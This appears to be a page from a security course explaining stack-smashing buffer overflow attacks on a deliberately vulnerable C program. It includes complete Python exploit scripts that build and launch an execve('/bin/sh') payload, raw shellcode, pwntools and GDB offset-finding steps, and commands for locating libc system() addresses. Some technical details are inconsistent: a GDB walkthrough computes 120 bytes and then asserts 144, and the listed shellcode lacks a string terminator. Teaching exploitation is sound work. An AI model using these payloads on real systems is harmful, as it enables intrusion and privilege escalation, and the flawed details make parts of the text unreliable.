Loading content...
In 1996, Elias Levy (known as Aleph One) published "Smashing the Stack for Fun and Profit" in Phrack Magazine—an underground hacker publication. This seminal article didn't invent stack smashing attacks, but it codified them so clearly that it became the canonical reference for a generation of security researchers and attackers alike.
The title was apt. Stack smashing wasn't just powerful—it was elegant. A carefully crafted string of bytes, sent to a vulnerable program, could rewrite the very fabric of its execution flow. The program's own stack, its trusted workspace for function calls, became the weapon used against it.
In this page, we dissect the mechanics of stack smashing with surgical precision. You'll understand exactly how an overflow becomes an exploit, byte by byte, address by address.
By the end of this page, you will understand: the exact structure of exploit payloads, how return addresses are located and overwritten, the role of NOP sleds and shellcode placement, handling practical challenges like null bytes and alignment, and how to calculate offsets for reliable exploitation.
Let's establish the canonical vulnerable program and trace exactly how an attacker exploits it. We'll use a slightly expanded version of our earlier example:
123456789101112131415161718192021222324252627282930
#include <stdio.h>#include <string.h> // Simulates reading input from network/file/uservoid process_request(char *request) { char buffer[128]; // 128 bytes allocated int request_type = 0; // Local variable after buffer // VULNERABLE: No bounds checking on copy strcpy(buffer, request); // Copy until null terminator if (request_type == 1) { printf("Processing admin request...\n"); } else { printf("Received: %s\n", buffer); }} int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s <request>\n", argv[0]); return 1; } printf("Server processing request...\n"); process_request(argv[1]); printf("Request complete.\n"); return 0;}The Stack Layout When process_request Executes
When main calls process_request(argv[1]), the stack is arranged as follows (x86-64 architecture, simplified):
| Stack Address | Content | Size | Purpose |
|---|---|---|---|
| RSP+0x00 | buffer[0..7] | 8 bytes | Start of vulnerable buffer |
| RSP+0x08 | buffer[8..15] | 8 bytes | ... |
| ... | ... | ... | ... |
| RSP+0x78 | buffer[120..127] | 8 bytes | End of 128-byte buffer |
| RSP+0x80 | request_type | 4 bytes | Local variable (int) |
| RSP+0x84 | Padding | 4 bytes | Alignment padding |
| RSP+0x88 | Saved RBP | 8 bytes | Caller's frame pointer |
| RSP+0x90 | Return Address | 8 bytes | ⚠️ Address in main() to return to |
| RSP+0x98 | main's stack frame... | ... | Caller's context |
The Attack Path
If we provide input longer than 128 bytes:
buffer (as intended)request_typeWhen process_request executes its epilogue (leave; ret), the CPU:
We now control where the program executes next.
The exact offset from buffer start to return address depends on: buffer size, local variable sizes, compiler padding/alignment decisions, calling convention, and architecture (32-bit vs 64-bit). These values must be determined empirically through debugging or pattern analysis—they're not purely predictable from source code.
A stack smashing exploit payload is more than just "a lot of data followed by an address." Professional exploit development requires understanding each component's purpose and the constraints that shape payload construction.
Component 1: NOP Sled (Landing Zone)
The NOP (No OPeration) sled consists of many NOP instructions (opcodes like \x90 on x86). Its purpose is to increase the target area for the redirected execution.
Why is this necessary? ASLR (Address Space Layout Randomization) and slight variations in memory layout mean we often can't predict the exact address of our shellcode. If we aim for the middle of a NOP sled instead of the shellcode start, we have a much larger margin of error. Execution slides down the NOPs until it reaches the shellcode.
Component 2: Shellcode (Payload)
Shellcode is the actual malicious machine code. Common shellcode types:
/bin/sh (local privilege escalation)Component 3: Padding
Filler bytes to reach the exact offset of the return address. Often uses recognizable patterns like AAAA... during development, then replaced with NOP bytes or junk in final exploit.
Component 4: Return Address
The address that overwrites the saved return address on the stack. This must point back into our NOP sled or directly to our shellcode. Getting this right is the crux of reliable exploitation.
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253
#!/usr/bin/env python3"""Classic stack smashing exploit structureTarget: vulnerable.c compiled without protectionsArchitecture: x86-64 Linux""" # Configurationbuffer_size = 128local_vars_size = 8 # request_type + paddingsaved_rbp_size = 8offset_to_ret = buffer_size + local_vars_size + saved_rbp_size # 144 bytes # Component 1: NOP sled (landing zone)NOP = b"\x90"nop_sled = NOP * 64 # 64 NOPs for landing area # Component 2: Shellcode - execve("/bin/sh", NULL, NULL)# This is 27-byte x86-64 Linux shellcode (example)shellcode = ( b"\x48\x31\xf6" # xor rsi, rsi b"\x48\xbf\x2f\x62\x69\x6e" # movabs rdi, '/bin//sh' b"\x2f\x2f\x73\x68" b"\x57" # push rdi b"\x48\x89\xe7" # mov rdi, rsp b"\x48\x31\xd2" # xor rdx, rdx b"\xb0\x3b" # mov al, 59 (execve syscall) b"\x0f\x05" # syscall) # Component 3: Padding to reach return addresscurrent_length = len(nop_sled) + len(shellcode)padding_needed = offset_to_ret - current_lengthpadding = b"A" * padding_needed # Component 4: Return address (pointing into NOP sled)# This address must be determined empirically!# Example: stack address during debuggingreturn_addr = 0x7fffffffdea0 # MUST be adjusted per targetret_addr_bytes = return_addr.to_bytes(8, 'little') # Construct final payloadpayload = nop_sled + shellcode + padding + ret_addr_bytes print(f"Payload size: {len(payload)} bytes")print(f"NOP sled: {len(nop_sled)} bytes")print(f"Shellcode: {len(shellcode)} bytes")print(f"Padding: {len(padding)} bytes")print(f"Return address: {hex(return_addr)}") # Write payload to file or use directlywith open("payload.bin", "wb") as f: f.write(payload)Shellcode must avoid bytes that would terminate the copy (null bytes for strcpy, newlines for gets), be position-independent (no hardcoded absolute addresses), fit within the available buffer space, and work on the target architecture/OS. Writing reliable shellcode is an art in itself.
Determining the exact offset from the buffer start to the return address is crucial. Too short, and we don't overwrite it; too long, and we corrupt memory beyond, potentially crashing before we gain control. Several techniques are used:
Aa0Aa1Aa2...). Feed it to the program, and when it crashes, the overwritten RIP contains a unique substring. Look up that substring to find the exact offset.123456789101112131415161718192021222324252627282930313233343536373839
#!/usr/bin/env python3"""Pattern-based offset discovery using pwntools""" from pwn import * # Generate a cyclic pattern of 200 bytespattern = cyclic(200) # Creates 'aaaabaaacaaadaae...'print(f"Pattern: {pattern[:50]}...") # After crash, if RIP = 0x6161616a ('jaaa' in little-endian)# Find the offset:crash_value = 0x6161616a offset = cyclic_find(crash_value)print(f"Offset to return address: {offset} bytes") # Alternative: Find from substring# If crash shows RIP contains 'jaaa':offset_str = cyclic_find(b'jaaa')print(f"Offset (from string): {offset_str}") # Example using pwntools for complete exploit developmentcontext.arch = 'amd64'context.os = 'linux' # Create exploit payload once offset is knowndef create_exploit(offset, target_addr): payload = b"A" * offset # Fill to return address payload += p64(target_addr) # Overwrite with target return payload # Generate pattern file for manual testingwith open("pattern.txt", "wb") as f: f.write(pattern) print("\n[*] Feed pattern.txt to vulnerable program")print("[*] On crash, check register values or core dump")print("[*] Use cyclic_find(crash_value) to get offset")Practical Demonstration with GDB
Here's how to find the offset using a debugger:
12345678910111213141516171819202122232425262728
$ gdb -q ./vulnerable(gdb) set disable-randomization on # Disable ASLR for testing(gdb) break process_request(gdb) run AAAAAAAAAAAAtest # At breakpoint, examine stack layout:(gdb) info frameStack level 0, frame at 0x7fffffffe000: rip = 0x401196 in process_request; saved rip = 0x401223 called by frame at 0x7fffffffe020 (gdb) x/20gx $rsp0x7fffffffdf70: 0x0000000000000000 0x0000000000000000 <- buffer starts0x7fffffffdf80: 0x0000000000000000 0x0000000000000000...0x7fffffffdfef: 0x0000000000000000 <- buffer ends (128 bytes)0x7fffffffdff0: 0x00007fffffffe010 <- saved RBP0x7fffffffdff8: 0x0000000000401223 <- return address (144 bytes from start) # Calculate: buffer at 0x7fffffffdf80, ret addr at 0x7fffffffdff8# Offset = 0x7fffffffdff8 - 0x7fffffffdf80 = 0x78 = 120 bytes# (Note: Actual offset may vary based on compilation) (gdb) x/gx $rbp+80x7fffffffdff8: 0x0000000000401223 # Confirms return address location # Now we know: 144 bytes to reach return address Different compilers, optimization levels, and even compiler versions can produce different stack layouts. An exploit developed on GCC 9 might fail on GCC 11 due to different alignment decisions. Always test exploits against the exact target binary.
One of the most significant constraints in exploit development is handling null bytes (\x00). String functions like strcpy, gets, and sprintf treat null bytes as string terminators. If your payload contains a null byte, the copy stops there, and the rest of your payload never reaches its destination.
mov eax, 0 contains nullsxor eax, eax instead of mov eax, 012345678910111213141516171819202122232425262728293031323334353637383940
; PROBLEM: This shellcode contains null bytes; mov eax, 0x0000003b ; 3b 00 00 00 - THREE null bytes!; mov rdi, 0 ; Contains nulls ; SOLUTION: Null-free equivalents ; Instead of: mov eax, 0xor eax, eax ; Zero register without null bytes ; Instead of: mov rax, 0xor rax, rax ; Instead of: mov al, 59 (execve = 59 = 0x3b)push 59pop rax ; Avoid null bytes in immediate ; Instead of: mov rdi, address_with_nulls; Use stack to build strings:xor rdi, rdipush rdi ; Push null terminatormov rdi, 0x68732f2f6e69622f ; '/bin//sh' (8 bytes, no nulls)push rdimov rdi, rsp ; Point RDI to our string ; Instead of: mov rsi, 0xor rsi, rsi ; NULL for argv ; Instead of: mov rdx, 0 xor rdx, rdx ; NULL for envp ; Full null-free execve shellcode for x86-64:; xor rsi, rsi ; argv = NULL; push rsi ; null terminator for string; mov rdi, 0x68732f2f6e69622f ; '/bin//sh'; push rdi; mov rdi, rsp ; pointer to '/bin//sh'; xor rdx, rdx ; envp = NULL; push 59; pop rax ; syscall number for execve; syscallThe 64-bit Address Challenge
On 64-bit systems, virtual addresses for user space are typically in the range of 0x00007fffffffffff and below. This means the upper two bytes of every user-space address are null!
For example, a stack address like 0x00007fffffffdea0 contains TWO null bytes at the front.
Solutions for 64-bit:
Rely on implicit null bytes: When strcpy stops at the first null in your address, the null bytes are "already there" as padding on the stack. This only works if you're overwriting toward higher addresses.
Use addresses in lower regions: In some scenarios, you can find usable addresses without leading nulls.
Pivoting techniques: Use return-oriented programming (covered later) to avoid needing clean addresses in your initial payload.
Exploit different vulnerability types: read() and memcpy() don't treat null bytes specially, so exploits using these are not constrained.
On little-endian systems (x86, x86-64), multi-byte values are stored with the least significant byte first. For the address 0x00007fffffffdea0, the bytes in memory are: a0 de ff ff ff 7f 00 00. The null bytes come LAST. If we're overwriting just enough to reach the return address and leverage implicit nulls, we only need to write the first 6 non-null bytes.
Once we control the return address, we need to redirect it somewhere useful. The target depends on what we want to execute and what addresses are available.
system() with /bin/sh as argument. Doesn't require executable stack.Finding Usable Addresses
In the absence of ASLR (or if ASLR is bypassed/weak), addresses are predictable:
| Source | Typical Address Range | ASLR Status | Use Case |
|---|---|---|---|
| Main binary (.text) | 0x400000 - 0x4fffff | Often not randomized (PIE off) | ROP gadgets, direct function calls |
| Stack | 0x7fff00000000+ | Randomized by default | Shellcode (if executable) |
| Heap | Varies | Partially randomized | Heap spray, object corruption |
| libc | Varies | Randomized (high entropy) | return-to-libc, ROP gadgets |
| Shared libraries | Varies | Randomized | Additional gadgets, functions |
12345678910111213141516171819202122232425262728
#!/bin/bash# Reconnaissance: Finding useful addresses # Check if PIE (Position Independent Executable) is enabledchecksec --file=./vulnerable# Output: PIE: No means main binary addresses are fixed # Find libc base address (ASLR disabled or using info leak)ldd ./vulnerable# libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c00000) # Find 'system' function address in libcreadelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep "system"# system@@GLIBC_2.2.5 at offset 0x50d70 # Find '/bin/sh' string in libcstrings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"# 0x1d8678 /bin/sh # Calculate absolute addresses (libc_base + offset):# system: 0x00007ffff7c00000 + 0x50d70 = 0x7ffff7c50d70# "/bin/sh": 0x00007ffff7c00000 + 0x1d8678 = 0x7ffff7dd8678 # Find useful ROP gadgets in binaryROPgadget --binary ./vulnerable | head -20 # Check memory layout of running processcat /proc/$(pgrep vulnerable)/mapsWith ASLR enabled, library and stack addresses change each run. Exploits must either: (1) Leak an address first to calculate targets, (2) Use fixed addresses from non-PIE binaries, (3) Brute-force a small entropy space (32-bit has only ~12-16 bits of entropy), or (4) Use format string or other bugs to read memory before exploiting.
Let's walk through a complete stack smashing exploit development process against our vulnerable program, assuming a system without modern protections (for educational purposes).
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106
#!/usr/bin/env python3"""Complete stack smashing exploit for vulnerable.cEnvironment: x86-64 Linux, ASLR disabled, DEP disabled, no stack canariesCompile target: gcc -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c""" import structimport subprocessimport sys # =========================================# STEP 1: Determine offset to return address# =========================================# From pattern analysis or debugging: 144 bytes to return addressOFFSET_TO_RET = 144 # =========================================# STEP 2: Develop null-free shellcode# =========================================# x86-64 Linux execve("/bin/sh") shellcode (27 bytes, no null bytes)shellcode = bytes([ 0x48, 0x31, 0xf6, # xor rsi, rsi 0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, # movabs rdi, '/bin//sh' 0x2f, 0x2f, 0x73, 0x68, 0x57, # push rdi 0x48, 0x89, 0xe7, # mov rdi, rsp 0x48, 0x31, 0xd2, # xor rdx, rdx 0xb0, 0x3b, # mov al, 59 0x0f, 0x05 # syscall]) # =========================================# STEP 3: Find target address# =========================================# With GDB, we found buffer starts at approximately 0x7fffffffdcc0# We'll aim for middle of NOP sled for reliabilityNOP_SLED_SIZE = 100TARGET_ADDR = 0x7fffffffdcc0 + (NOP_SLED_SIZE // 2) # =========================================# STEP 4: Construct the payload# =========================================def build_payload(): payload = b"" # NOP sled - landing zone (100 bytes) payload += b"\x90" * NOP_SLED_SIZE # Shellcode (27 bytes) payload += shellcode # Current payload size current_size = len(payload) # 127 bytes # Padding to reach return address (17 bytes to reach 144) padding_needed = OFFSET_TO_RET - current_size payload += b"A" * padding_needed # Return address (8 bytes, little-endian) # Note: Upper bytes are nulls, but strcpy will stop there # We only need 6 bytes since upper 2 are implicitly null payload += struct.pack("<Q", TARGET_ADDR) return payload # =========================================# STEP 5: Execute the exploit# =========================================def main(): payload = build_payload() print(f"[*] Payload size: {len(payload)} bytes") print(f"[*] NOP sled: {NOP_SLED_SIZE} bytes") print(f"[*] Shellcode: {len(shellcode)} bytes") print(f"[*] Target address: {hex(TARGET_ADDR)}") print(f"[*] Offset to return: {OFFSET_TO_RET}") # Verify no nulls in critical portion critical_portion = payload[:OFFSET_TO_RET] if b'\x00' in critical_portion: print("[!] Warning: Null byte in payload before return address!") null_pos = critical_portion.find(b'\x00') print(f"[!] Null at offset: {null_pos}") # Write payload for manual testing with open("payload.bin", "wb") as f: f.write(payload) print("[*] Payload written to payload.bin") # Execute (WARNING: Only in controlled environment!) print("[*] Launching exploit...") try: # Run vulnerable program with our payload result = subprocess.run( ["./vulnerable", payload], timeout=5 ) except Exception as e: print(f"[*] Execution resulted in: {e}") print("[*] If you see a shell prompt, the exploit succeeded!") if __name__ == "__main__": main() print("\n[*] If successful, you should have a shell.") print("[*] Type 'id' or 'whoami' to verify.")Execution Flow After Successful Exploit
main() calls process_request(payload)strcpy copies payload into buffer, overflowing 144+ bytesleave; retexecve("/bin/sh", NULL, NULL)If the process ran as root (e.g., a setuid binary or privileged daemon), we now have a root shell.
This relatively simple technique—overwriting a return address—transforms a memory corruption bug into arbitrary code execution. The combination of predictable memory layout, lack of bounds checking, and executable stacks made this attack devastatingly effective for decades.
One of the most fascinating aspects of stack smashing is that even a single-byte overflow can be enough for exploitation. Off-by-one errors—where a loop writes exactly one byte past the buffer—are common and surprisingly exploitable.
123456789101112131415161718192021
// Classic off-by-one vulnerabilityvoid copy_string(char *dest, const char *src, size_t size) { size_t i; // Bug: Loop condition uses <= instead of < // Allows writing one byte past buffer end for (i = 0; i <= size; i++) { // WRONG: should be i < size dest[i] = src[i]; if (src[i] == '\0') break; }} void vulnerable() { char buffer[64]; char *input = get_user_input(); // Returns 64+ byte string copy_string(buffer, input, 64); // If input is 64 bytes + null, we write buffer[64] = '\0' // This overwrites one byte of saved RBP!}How One Byte Becomes Code Execution
The off-by-one overwrites the least significant byte of the saved frame pointer (RBP). This might seem useless, but consider:
When the function returns, it executes leave which does:
mov rsp, rbp — RSP gets the corrupted RBP valuepop rbp — Pops whatever is at corrupted RSP locationThe caller also executes leave; ret:
leave uses the corrupted frame chainret pops a return address from a memory location we influencedIf we carefully control what value we overwrite that byte with, we can point the frame into our buffer, where we've placed a controlled return address.
This is called "Frame Pointer Overwrite" or "Off-by-One Stack Pivot"
The attack requires:
This demonstrates that security margins matter: even one byte of overflow, in the right place, compromises the system.
Off-by-one bugs are among the most commonly found vulnerabilities in code audits. They're easy to introduce (fence-post errors are a classic programming mistake) and often dismissed as 'just one byte.' But as we've seen, one byte can be enough. Always audit loop bounds and buffer size calculations with extreme care.
We've dissected the mechanics of stack smashing—the foundational exploitation technique for buffer overflows. Let's consolidate the key insights.
What's Next: Code Injection
The next page explores code injection in depth—the development of shellcode, techniques for encoding payloads to bypass filters, and the art of writing position-independent malicious code. We'll examine how attackers craft the payload that executes once they've redirected control flow.
You now understand the precise mechanics of stack smashing attacks: how return addresses are located and overwritten, how exploit payloads are structured, and the practical challenges of reliable exploitation. This foundation is essential for understanding both advanced exploitation techniques and the defenses designed to stop them.